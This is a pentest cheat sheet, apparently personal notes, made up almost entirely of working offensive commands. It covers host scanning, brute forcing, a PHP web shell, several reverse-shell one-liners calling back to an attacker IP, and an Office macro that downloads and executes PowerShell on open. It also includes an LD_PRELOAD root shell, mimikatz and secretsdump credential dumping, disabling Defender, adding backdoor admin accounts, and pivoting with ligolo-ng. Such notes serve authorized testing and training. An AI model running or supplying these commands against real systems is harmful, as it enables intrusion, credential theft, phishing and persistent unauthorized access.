
VAPT Notes

Notes for Pentest

VAPT Notes

Disclaimer: This cheat sheet has been compiled from multiple sources to aid fellow pentesters and red teamers in their learning. Credit for all the tools and techniques belongs to their original authors.

Network

Network Enumeration

Host Discovery

# A TTL of 63 suggests a Linux host
# A TTL of 127 suggests a Windows host
$ ping $IP 

# Disable the port scan and only discover live hosts on the subnet
$ sudo nmap -sn $IP/24 

# Skip host discovery (ping) and only scan ports
$ sudo nmap -p- --min-rate 1000 $IP -Pn 
$ sudo nmap -sU -p- --min-rate 1000 $IP -Pn

# Scan network ranges
$ sudo nmap $IP/24 -sn -oA filename | grep for | cut -d" " -f5 
# Scan network ranges on a predefined ip list
$ sudo nmap -sn -oA filename -iL hosts.lst | grep for | cut -d" " -f5 

Advanced Network Scans

# Typical scans for open ports found
$ sudo nmap -p <ports> -sV -sC -A $IP -oN nmap_servers
$ sudo nmap -sU -p <ports> -sV -sC -A $IP -oN nmap_servers

# Stealthy scans
$ sudo nmap -sS -p- --min-rate=1000 $IP -Pn

# Try to connect to filtered port
$ ncat -nv --source-port 53 $IP <port>

# Scan using decoys
$ sudo nmap $IP -p- -sS -Pn -n --disable-arp-ping --packet-trace -D RND:5

# Scan using a specific source IP address and interface
$ sudo nmap $IP -p 445 -Pn -n -O -S $allowed_ip -e tun0 

# SYN-Scan filtered ports From DNS port
$ sudo nmap $IP -p- -sS -Pn -n --disable-arp-ping --source-port 53

# Other DNS proxying techniques
$ sudo nmap $IP -p50000 --source-port 53
$ netcat -nv --source-port 53 $IP 50000

Port Enumeration

FTP | Port 21
# Try to connect to FTP
$ ftp -A $IP
$ ftp $IP

# Set transmission to binary instead of ascii
ftp> binary
# Put file to FTP
ftp> put winPEASx86.exe

# Brute force FTP
$ hydra -l user -P /usr/share/wordlists/rockyou.txt $IP -t 4 ftp

# Download all files from FTP
$ wget -r ftp://user:pass@$IP/
SSH | Port 22
$ nc -nvlp 443
$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa user@$IP -t 'bash -i >& /dev/tcp/$OUR_IP/443 0>&1'

# Brute force SSH
$ hydra -l user -P /usr/share/wfuzz/wordlist/others/common_pass.txt $IP -t 4 ssh
$ hydra -L users.txt -p password $IP -t 4 ssh -s <port>

# Change permissions of private key
$ chmod 600 id_rsa
$ ssh user@$IP -i id_rsa

# Convert key to hash for cracking
$ ssh2john id_ecdsa > id_ecdsa.hash
# Crack hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt id_ecdsa.hash
Telnet | Port 23
$ telnet -l user $IP
SMTP | Port 25
$ nc -nv $IP 25
$ telnet $IP 25
DNS | Port 53
# DNS zone transfer
$ dnsrecon -d domain_name -n $IP -t axfr

# Fetch name servers
$ dig +noall +answer -t NS target.com 
# Fetch exchange servers
$ dig +noall +answer -t MX target.com 
# Interrogate a specified domain name server
$ dig +noall +answer -t ANY target.com @ns.target.com 
# Fetch the zone file for a specified domain name server
$ dig +noall +answer -t AXFR target.com @ns.target.com 
# Reverse DNS lookup
$ dig +noall +answer -x 192.168.8.5 

# Subdomain brute force
$ gobuster dns -t 30 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -d website.site
HTTP(S) | Ports 80, 443
# Check robots.txt, sitemap.xml, crossdomain.xml, clientaccesspolicy.xml, .well-known.xml

# If there is /cgi-bin endpoint, try shellshock

$ whatweb -a 3 $IP
$ nikto -ask=no -h http://$IP 2>&1

$ dirsearch -w /usr/share/seclists/Discovery/Web-Content/common.txt -e html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip -x 400,401,402,403,404 -u 10.10.10.10

$ gobuster dir -u http://$IP/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip -b 404,403,400,402,401
$ gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip

$ feroxbuster -u http://$IP/ -t 30 -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt -x "html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip" -v -k -n -e --auto-tune
$ feroxbuster -u http://$IP:8000/cms/ -t 30 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip" -v -k -n -e -C 404 # if we dont want to see any denied
$ feroxbuster -u http://$IP:8000/cms/ -t 30 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip" -v -k -n -e -C 404,302 # if website redirects

$ curl http://$ip/api/
$ curl http://$ip/api/user/v1/
$ curl http://$ip/api/user/v2/

# Fuzzing
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://$IP/FUZZ
$ ffuf -u http://www.target.com -H "Host: FUZZ.target.com" -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -ac
# Fuzzing get parameters
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -fs xxx -u 'http://target.com/admin/admin.php?FUZZ=key' 
# Fuzzing post parameters
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://target.com/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx 
# Fuzzing vhosts
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://$IP -H "HOST: FUZZ.website.com" -fs 10918 
# Fuzzing subdomains
$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.website.htb/ 
# Fuzzing post parameter values
$ ffuf -w ids.txt:FUZZ -u http://target.com/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx 
# Fuzzing get parameter values
$ ffuf -w ids.txt:FUZZ -fs xxx -u 'http://target.com/admin/admin.php?id=FUZZ'

# Login Brute Force
$ hydra -l admin -P rockyou.txt $IP http-post-form "/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V

# Wordpress Scan
$ wpscan --url https://$IP --random-user-agent --ignore-main-redirect --api-token <token>

# AWS Web Service Bucket
$ aws configure
$ aws --endpoint=http://s3.abc.com s3 ls
$ aws --endpoint=http://s3.abc.com s3 ls s3://abc.com
$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
$ aws --endpoint=http://s3.abc.com  s3 cp shell.php s3://abc.com
$ curl http://abc.com/shell.php?cmd=id
$ nc -nvlp 1234
$ rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.108+1234+>/tmp/f
SMB | Ports 139, 445
$ smbclient -L \\$IP -U "" -N -p 12445
$ smbclient '//$IP/C' -p 12445

$ smbmap -H $IP
$ smbmap -u "username" -p "password" -H $IP
$ smbmap -H $IP -u null

$ enum4linux -a -M -l -d $IP 2>&1
$ enum4linux -a -u "" -p "" $IP && enum4linux -a -u "guest" -p "" $IP

$ nxc smb $IP
$ nxc smb $IP -u "" -p "" --shares
$ nxc smb $IP -u 'guest' -p '' --users
$ nxc smb $IP -u users.txt -p 'Pass!' --local-auth --continue-on-success
$ nxc smb $IP -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
$ nxc smb $IP/24 -u administrator -p 'Password123!' --loggedon-users
$ nxc smb $IP -u administrator -p 'Password123!' --sam
$ nxc smb $IP -u Administrator -H <hash>
$ nxc smb dc.abc.org -u '' -p '' --shares
# spider and export all files
$ nxc smb $IP -u 'user' -p 'pass' -M spider_plus -o DOWNLOAD_FLAG=True
# list all files
$ nxc smb $IP -u 'user' -p 'pass' -M spider_plus

$ impacket-psexec administrator:'Password123!'@$IP
SNMP | Port 161 UDP
$ nmap --script snmp-* -sU -p161 $IP
$ snmpwalk -c public -v1 $IP
$ snmpcheck -t $IP -c public # Better than snmpwalk
$ snmpwalk -c public -v1 -t 10 $IP # Displays entire MIB tree 

# Windows MIB values
1.3.6.1.2.1.25.1.6.0 - System Processes
1.3.6.1.2.1.25.4.2.1.2 - Running Programs
1.3.6.1.2.1.25.4.2.1.4 - Processes Path
1.3.6.1.2.1.25.2.3.1.4 - Storage Units
1.3.6.1.2.1.25.6.3.1.2 - Software Name
1.3.6.1.4.1.77.1.2.25 - User Accounts
1.3.6.1.2.1.6.13.1.3 - TCP Local Ports
$ snmpwalk -c public -v1 $IP <MIB>
LDAP | Port 389, 636, 3268, 3269
$ ldapsearch -x -H ldap://<IP>:<port> # try on both ldap and ldaps
$ ldapsearch -x -H ldap://$IP -s base namingcontexts
...
dn:
namingcontexts: DC=hutch,DC=offsec
namingcontexts: CN=Configuration,DC=hutch,DC=offsec
...
$ ldapsearch -x -H ldap://$IP -b "DC=hutch,DC=offsec"
$ ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
# The CN component of the base DN names the container whose entries we want to collect
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

# https://github.com/ropnop/windapsearch
$ python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --computers
$ python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --groups
$ python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --da
$ python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --privileged-users

$ nxc ldap $IP -u '' -p '' -M get-desc-users
$ nxc ldap $IP -u '' -p '' --password-not-required --admin-count --users --groups
MSSQL | Port 1433
$ proxychains nxc mssql -d domain_name -u user -p password -x "whoami" $IP
$ proxychains nxc mssql -d domain_name -u user -p password -x "whoami" $IP -q 'SELECT name FROM master.dbo.sysdatabases;'

mssql> EXEC SP_CONFIGURE 'show advanced options', 1
mssql> EXEC SP_CONFIGURE 'xp_cmdshell' , 1
mssql> xp_cmdshell 'whoami'
mssql> xp_cmdshell 'powershell "Invoke-WebRequest -Uri http://$IP:1337/shell.exe -OutFile c:\Users\Public\shell.exe"'
mssql> xp_cmdshell 'c:\Users\Public\shell.exe"'
NFS | Port 2049
$ nmap -sV --script=nfs-showmount $IP

# Show available NFS shares
$ showmount $IP
$ showmount -e $IP
# Mount NFS share
$ mkdir temp 
$ mount -t nfs -o vers=3 $IP:/home temp -o nolock
$ cd temp
$ tree.

Linux

Linux Enumeration

# UPGRADE YOUR SHELL WHEN YOU GAIN ACCESS TO A SYSTEM!
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
# or 
$ script /dev/null -c bash

$ uname -a
$ cat /etc/issue
$ cat /etc/*-release
$ sudo -l
$ ls -lsaht /etc/sudoers
$ groups <user>
$ env
$ find / -perm -u=s -type f 2>/dev/null
$ find / -perm -g=s -type f 2>/dev/null
$ netstat -antup
$ netstat -tunlp

Credential Hunting

# https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation
# files that were edited in the past 10 mins
$ find / -mmin -10 2>/dev/null | grep -Ev "^/proc"

# in memory passwords
$ strings /dev/mem -n10 | grep -i PASS

# find sensitive files
$ locate password | more
$ find / -name authorized_keys 2> /dev/null
$ find / -name id_rsa 2> /dev/null

Privilege Escalation

# find SUID binaries
$ find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
$ find / -uid 0 -perm -4000 -type f 2>/dev/null

$ sudo -l

# If LD_PRELOAD is explicitly defined in the sudoers file
$ cat shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/sh");
}

$ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
$ sudo LD_PRELOAD=<full_path_to_so_file> <program>

Persistence

$ adduser <uname> # Interactive
$ useradd <uname>
$ useradd -u <UID> -g <group> <uname>  # UID can be anything... this command is to add a user to a specific group

# Adding SSH public key
$ ssh-keygen -t rsa -b 4096 

# This creates both id_rsa and id_rsa.pub in the ~/.ssh directory
# Copy the content of "id_rsa.pub" to the target machine, creating the ".ssh" directory in the user's home if it does not exist
$ chmod 700 ~/.ssh
$ nano ~/.ssh/authorized_keys # enter the copied content here
$ chmod 600 ~/.ssh/authorized_keys

Windows

Phishing

Malicious Macro
Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadString('http://x.x.x.x/run.ps1') | IEX"
    Shell str, vbHide
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub
Sending Phishing Email
$ swaks --header "Subject: <subject>" --body "<body>" -t to_who@email.com -f from_who@email.com --server x.x.x.x --attach malicious.docm

Windows Enumeration

PS C:\> systeminfo
PS C:\> hostname
PS C:\> whoami
PS C:\> net users # local users
PS C:\> net users /domain # all users on Domain
PS C:\> net localgroups
PS C:\> net user user1 # more info about user1
PS C:\> net group /domain # enumerate all groups on the domain
PS C:\> net group /domain "group1" # more info about group1
PS C:\> netsh firewall show state
PS C:\> netsh firewall show config
PS C:\> ipconfig /all
PS C:\> route print
PS C:\> arp -A # look for IPs that the victim is connected to

Credentials Hunting

PS C:\> Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
PS C:\> Get-ChildItem -Path C:\Users -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
PS C:\> Get-ChildItem -Path C:\Users\user1\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction
PS C:\> tree /f C:\Users\ # look for interesting files, backups etc.
PS C:\> Get-History
PS C:\> (Get-PSReadlineOption).HistorySavePath
PS C:\> type <path>

Exploitation

Binary Hijacking
PS C:\> icalcs "path" # check for F (full permission)
PS C:\> sc qc <servicename>
PS C:\> sc config <service> <option>="<value>" # change the path to the reverseshell location
PS C:\> sc start <servicename>
Unquoted Service Path
PS C:\> wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
PS C:\> icalcs "path" # check for writeable permission
# Replace the executable in the service folder and start the service
PS C:\> sc start <servicename>
Insecure Service Executables
PS C:\> icalcs "path" # File Permissions: Everyone [AllAccess]
# Replace the executable in the service folder and start the service
PS C:\> sc start <service>
Weak Registry Permissions
PS C:\> accesschk /acceptula -uvwqk HKLM\system\currentcontrolset\services\<service> # Check for KEY_ALL_ACCESS
PS C:\> reg query HKLM\system\currentcontrolset\services\<service>
PS C:\> reg add HKLM\SYSTEM\CurrentControlSet\services\<service> /v ImagePath /t REG_EXPAND_SZ /d reverse.exe /f
PS C:\> net start <service>
DLL Hijacking
# use Procmon to check for missing DLLs ("NAME NOT FOUND")
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attaker-IP> LPORT=<listening-port> -f dll > filename.dll
Scheduled Tasks
PS C:\> schtasks /query /fo LIST /v | findstr /B /C:"Folder" /C:"TaskName" /C:"Run As User" /C:"Schedule" /C:"Scheduled Task State" /C:"Schedule Type" /C:"Repeat: Every" /C:"Comment"
PS C:\> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
PS C:\> schtasks /query /fo LIST | Where-Object {$_ -like "TaskName*"} | select-string "privilege"
PS C:\> icalcs <path> # need to be writeable

Privilege Escalation

# https://github.com/CCob/SweetPotato
PS C:\> .\SweetPotato.exe -e EfsRpc -p c:\Users\Public\nc.exe -a "$KALI_IP 1234 -e cmd"

# https://github.com/BeichenDream/GodPotato/releases
PS C:\> .\GodPotato.exe -cmd "cmd /c whoami"
PS C:\> .\GodPotato.exe -cmd "shell.exe"

Persistence

PS C:\> net user administrator password
PS C:\> net localgroup Administrators hacker /add
PS C:\> net localgroup "Remote Desktop Users" hacker /ADD

Active Directory

https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet

https://swisskyrepo.github.io/InternalAllTheThings/

AD Enumeration

$ impacket-GetADUsers -dc-ip $DC_IP "domain.name/" -all 
$ impacket-GetADUsers -dc-ip $DC_IP domain.name/username:password -all
PS C:\> net user /domain
PS C:\> net user <user> /domain
PS C:\> net group /domain
# Download and use PowerView
PS C:\> curl https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 -o PowerView.ps1
PS C:\> ..\PowerView.ps1
# Get members of local group (PowerView)
PS C:\> Get-NetLocalGroup -ComputerName <domain> -Recurse
# Find DC hostname
PS C:\> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

Secrets Dumping

$ impacket-secretsdump Administrator:'password'@$IP -outputfile hashes
PS C:\> ./mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
PS C:\> ./mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "vault::cred /patch" "exit"
PS C:\> .\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::msv" "lsadump::sam" "exit"

# Leverage ScriptBlock
PS C:\> $sess = New-PSSession -ComputerName <hostname>
PS C:\> Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
PS C:\> iex (iwr http://$IP/Invoke-Mimikatz.ps1 -UseBasicParsing)
PS C:\> Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess

$ nxc smb $IP/24 -u -u 'user' -p 'pass' --sam
$ nxc smb $IP/24 -u 'user' -p 'pass' --lsa
$ nxc smb $IP -u 'user' -p 'pass' --ntds
$ nxc smb $IP -u 'user' -p 'pass' --ntds --users
$ nxc smb $IP -u 'user' -p 'pass' --ntds --users --enabled
$ nxc smb $IP -u 'user' -p 'pass' --ntds vss
meterpreter> load kiwi
meterpreter> creds_msv

AD Exploitation

$ nxc smb $IP -u users.txt -p 'password' -d domain.name --continue-on-success
$ nxc smb $IP -u user -p 'password' -d domain.name
$ nxc smb $IP -u users.txt -p pass.txt -d domain.name --continue-on-success
$ proxychains nxc smb $IP -u Administrator -p password -x whoami --local-auth
$ proxychains nxc winrm $IP -u Administrator -p password -x whoami --local-auth
$ nxc winrm $IP -u users.txt -p 'password' -d domain.name --continue-on-success
$ nxc winrm $IP -u user -p 'password' -d domain.name
$ nxc winrm $IP -u users.txt -p pass.txt -d domain.name --continue-on-succes
$ proxychains nxc mssql -d domain.name -u user -p password -x "whoami" $IP

# SMB Execute commands on behalf of other users
$ nxc smb $IP -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>
$ netexec smb $IP -u Username -p Password -X 'powershell -e <base64_encoded_payload>'

# Dump file for bloodhound
$ nxc ldap $IP -u user -p pass --bloodhound -ns <ns-ip> --collection All

# AS-REP ROAST
$ nxc ldap $IP -u user -p '' --asreproast output.txt
$ nxc ldap $IP -u user.txt -p '' --asreproast output.txt

# Kerberoast
$ nxc ldap $IP -u user -p pass --kerberoasting output.txt
PS C:\> Add-DomainGroupMember -Identity 'SQLManagers' -Members 'user'
PS C:\> Get-NetGroupMember -GroupName 'SQLManagers'

Persistence

PS C:\> net user <user> <password> /add
PS C:\> net localgroup Administrators <user> /add
PS C:\> net localgroup "Remote Management Users" <user> /add
PS C:\> net localgroup "Remote Desktop Users" <user> /add
PS C:\> Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
PS C:\> Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

Lateral Movement

PS C:\> runas /user:<hostname>\<user> cmd

ligolo-ng

Sources: 1, 2, 3

Create TUN Interfaces
# Download the proxy and agent from https://github.com/nicocha30/ligolo-ng/releases/

# Create new tun interfaces
kali$ sudo ip tuntap add user <username> mode tun ligolo1
kali$ sudo ip link set ligolo1 up

kali$ sudo ip tuntap add user <username> mode tun ligolo2
kali$ sudo ip link set ligolo2 up

kali$ sudo ip tuntap add user <username> mode tun ligolo3
kali$ sudo ip link set ligolo3 up

# Confirm that your new interfaces are up
kali$ ip a

# Start the proxy on Kali machine
kali$ ligolo-proxy -selfcert
First Pivot (Kali --> ligolo1)
# Windows
ligolo1 cmd> ./agent.exe -connect <kali_ip>:11601 -ignore-cert

# Linux
ligolo1$ chmod +x agent && ./agent -connect <kali_ip>:11601 -ignore-cert

# Starting our Pivot
# Choose a session
ligolo-ng$ session
# Verify network instances on connected agent
ligolo1_agent$ ifconfig
ligolo1_agent$ start

# Add a new route (ligolo1 subnet) to our proxy
kali$ sudo ip route add 192.168.8.0/24 dev ligolo1
# Confirm that the route was added
kali$ ip route
# Try pinging the internal server now
kali$ ping 192.168.8.129

# Do a ping sweep to find ligolo2
kali$ for i in {1..254}; do (ping -c 1 192.168.8.$i) | grep "bytes from" &) ;done

# Forward traffic from port 8080 on ligolo1 to port 80 on our Kali
ligolo1_agent$ listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80 --tcp
ligolo1_agent$ listener_list
Second Pivot (Kali --> ligolo1 (Jump Host) --> ligolo2)
# On ligolo2, download netcat from Kali through ligolo1
ligolo2 cmd> certutil -urlcache -f http://<ligolo1_ip>:8080/nc.exe nc.exe

# Forward traffic from port 4444 on ligolo1 to port 444 on our Kali
ligolo1_agent$ listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:444 --tcp
ligolo1_agent$ listener_list

# Execute netcat on ligolo2 to connect back to us through ligolo1
ligolo2 cmd> ./nc.exe <ligolo1_ip> 4444 -e cmd.exe

# Catch the reverse shell on our Kali
kali$ nc -nlvp 444

# Upload agent to ligolo2
ligolo2 cmd> certutil -urlcache -f http://<ligolo1_ip>:8080/agent.exe agent.exe

# To run Agent on ligolo2, we must create a new listener on ligolo1
ligolo1_agent$ listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

# Execute Agent on ligolo2
ligolo2 cmd> ./agent.exe -connect <ligolo1_ip>:11601 -ignore-cert

# Start the tunnel on Ligolo proxy
ligolo-ng$ session # find ligolo2 agent
ligolo2_agent$: start --tun ligolo2
ligolo2_agent$ ifconfig

# Add a new route (ligolo2 subnet) to our proxy
kali$ sudo ip route add 192.186.119.0/24 dev ligolo2

# Do a ping sweep to find ligolo3
kali$ for i in {1..254}; do (ping -c 1 192.168.119.$i) | grep "bytes from" &) ;done

We can also use nxc:

nxc smb <ligolo2_ip> -u user -H hash -x 'certutil -f -urlcache http://<kali_ip>:8080/tools/ligolo/ligolo-ng_agent_windows_amd64/agent.exe c:\windows\system32\agent.exe'

nxc smb <ligolo2_ip> -u user -H hash -x 'c:\windows\system32\agent.exe -connect <ligolo1_ip>:11601 -ignore-cert'

Third Pivot
# On ligolo3, download netcat from Kali through ligolo2
ligolo3 cmd> certutil -urlcache -f http://<ligolo2_ip>:8080/nc64.exe nc.exe

# Forward traffic from port 9090 on ligolo2 to port 999 on our Kali
ligolo2_agent> listener_add -addr 0.0.0.0:9090 --to 127.0.0.1:999 --tcp

# Execute netcat on ligolo3 to connect back to us through ligolo2
ligolo3 cmd> .\nc.exe <ligolo2_ip> 9090 -e cmd.exe

# Catch the reverse shell from ligolo3
kali$ nc -nlvp 999

# Upload agent to ligolo3
ligolo3 cmd> certutil -urlcache -f http://<ligolo2_ip>:8080/agent.exe agent.exe

ligolo2_agent> listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

ligolo3 cmd> .\agent.exe -ignore-cert -connect <ligolo2_ip>:11601

ligolo2_agent> session # choose ligolo 3
ligolo3_agent> ifconfig
ligolo3_agent> start --tun ligolo3

kali$ sudo ip route add 192.168.79.0/24 dev ligolo3

kali$ ping 192.168.79.128

Using SSH

Referenced from https://notes.benheater.com/books/network-pivoting/page/ssh-port-forwarding

SSH Local Port to Remote Port (-L)

Purpose: Access remote services from your local machine.

Example:

  • Local Port: 127.0.0.1:43306 on the attack box.
  • Remote Port: 127.0.0.1:3306 on the target machine.
  • Traffic sent to 127.0.0.1:43306 on the attack box is forwarded to 127.0.0.1:3306 on the remote server.
$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L attack-ip:attack-port:remote-ip:remote-port -i /path/to/private-key user@target

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L 127.0.0.1:43306:127.0.0.1:3306 user@target

# Once configured
local$ mysql -u username -p -h 127.0.0.1 -P 43306
local$ curl http://127.0.0.1:43306
SSH Remote Port to Local Port (-R)

Purpose: Allow remote machines to access services on your local machine.

Example:

  • Remote Port: 127.0.0.1:43306 on the target machine.
  • Local Port: 127.0.0.1:3306 on the attack box.
  • Traffic sent to 127.0.0.1:43306 on the target is forwarded to 127.0.0.1:3306 on the attack box.
$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port:local-ip:local-port -i /path/to/private/key user@attack-box-ip

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R 127.0.0.1:43306:127.0.0.1:3306 user@attack-box-ip

# Once configured
remote$ mysql -u username -p -h 127.0.0.1 -P 43306
SSH Forward Dynamic SOCKS Proxy

Purpose: Create a proxy for accessing multiple hosts via the target dynamically.

Example:

  • SOCKS Proxy: 127.0.0.1:50001 on the attack box.
  • Any traffic configured to use this proxy is routed via the target, making it useful for accessing multiple remote hosts dynamically.
$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D attack-ip:attack-port -i /path/to/private-key user@target

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D 127.0.0.1:50001 user@target

# Once configured + edit proxychains
local$ proxychains curl http://remote_example.com
SSH Reverse Dynamic SOCKS Proxy

Purpose: Provide a proxy on the remote machine to access multiple local hosts.

Example:

  • SOCKS Proxy: 127.0.0.1:50001 on the target machine.
  • Any traffic configured to use this proxy on the target machine is routed via your local machine.
$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port -i /path/to/private-key user@attack-box-ip

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R 127.0.0.1:50001 user@attack-box-ip

# Once configured + edit proxychains
remote$ proxychains http://local_example.com

AV Evasion

https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/

General

virtualenv

# sudo apt-get install virtualenv
$ virtualenv myenv # create a virtual environment
$ source myenv/bin/activate # activate the virtual environment
$ deactivate # deactivate the virtual environment

base64

$ base64 -w0 <file> ; echo
$ cat <file> | base64 -d 

Connecting to Target

$ rlwrap -cAr nc -lnvp 443

$ evil-winrm -i $IP -u username -p password
$ evil-winrm -i $IP -u username -H "<hash>"

$ busybox nc $IP 1234 -e sh

$ ssh username@$IP

$ smbclient -U username \\\\$IP\\SHARENAME

Reverse Shells

msfvenom
# EXE 32 bit
$ msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

# EXE 64 bit
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

# ASP
$ msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

# JSP
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

# War
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

# PHP
$ msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php
One-Liners
$ bash -i >& /dev/tcp/$IP/4242 0>&1

$ python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$IP",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

<?php echo shell_exec('bash -i >& /dev/tcp/$IP/443 0>&1');?>

Text Manipulation

# search for files that contain the phrase "password"
$ grep -ir password
$ grep -iRl "password" ./

# exclude multiple strings
$ grep -Ev 'exclude1 | exclude2' filename.txt

# keep only the lines that contain no uppercase letters
$ grep -v '[A-Z]' users.txt

# search and replace strings
$ cat username.txt | sed s/{stringToBeChanged}/{replacementString}/g

curl

# upload files via curl
